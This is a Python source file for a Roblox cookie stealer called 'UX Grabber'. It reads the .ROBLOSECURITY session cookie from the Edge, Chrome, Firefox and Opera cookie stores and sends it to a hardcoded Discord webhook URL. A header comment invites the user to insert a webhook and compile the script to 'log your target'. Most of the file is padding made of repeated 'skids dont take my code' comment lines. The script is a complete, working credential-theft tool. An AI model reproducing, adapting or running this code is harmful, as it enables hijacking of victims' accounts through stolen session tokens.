



#  ░██████╗░█████╗░██████╗░██╗██████╗░████████╗██╗░░░██╗███╗░░██╗██╗██╗░░██╗--
 # ██╔════╝██╔══██╗██╔══██╗██║██╔══██╗╚══██╔══╝██║░░░██║████╗░██║██║╚██╗██╔╝--
#  ╚█████╗░██║░░╚═╝██████╔╝██║██████╔╝░░░██║░░░██║░░░██║██╔██╗██║██║░╚███╔╝░--
#  ░╚═══██╗██║░░██╗██╔══██╗██║██╔═══╝░░░░██║░░░██║░░░██║██║╚████║██║░██╔██╗░--
#  ██████╔╝╚█████╔╝██║░░██║██║██║░░░░░░░░██║░░░╚██████╔╝██║░╚███║██║██╔╝╚██╗-
#  ╚═════╝░░╚════╝░╚═╝░░╚═╝╚═╝╚═╝░░░░░░░░╚═╝░░░░╚═════╝░╚═╝░░╚══╝╚═╝╚═╝░░╚═╝---
#                        github.com/ScriptUnix 

 # WARNING touching with the code below will make the script not functional only insert your webhook..
 
import browser_cookie3, requests, threading

WebHook = "https://discord.com/api/webhooks/1047201308626669648/Tr8qR4JI2ay6jDgUWrX9XLCfEd5Y8ERmBoaCsOET9UtcXDaecnMBv3uLfMlYBphBgAmA" # Input your webhook here and make sure to compile if you want to log your target


# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code
# skids dont take my code

def MicrosoftEdge():
    try:
        cookies = browser_cookie3.edge(domain_name = "roblox.com")
        cookies = str(cookies)
        cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
        requests.post(WebHook, json = {"username" : "UX Grabber (FREE)", "content" : f"```{cookie}```"})
    except:
        pass

def GoogleChrome():
    try:
        cookies = browser_cookie3.chrome(domain_name = "roblox.com")
        cookies = str(cookies)
        cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
        requests.post(WebHook, json = {"username" : "UX Grabber (FREE)", "content" : f"```{cookie}```"})
    except:
        pass

def MozillaFirefox():
    try:
        cookies = browser_cookie3.firefox(domain_name = "roblox.com")
        cookies = str(cookies)
        cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
        requests.post(WebHook, json = {"username" : "UX Grabber (FREE)", "content" : f"```{cookie}```"})
    except:
        pass

def Opera():
    try:
        cookies = browser_cookie3.opera(domain_name = "roblox.com")
        cookies = str(cookies)
        cookie = cookies.split(".ROBLOSECURITY=")[1].split(" for .roblox.com/>")[0].strip()
        requests.post(WebHook, json = {"username" : "UX Grabber (FREE)", "content" : f"```{cookie}```"})
    except:
        pass

browsers = [MicrosoftEdge, GoogleChrome, MozillaFirefox, Opera]

for v in browsers:
    threading.Thread(target = v).start()
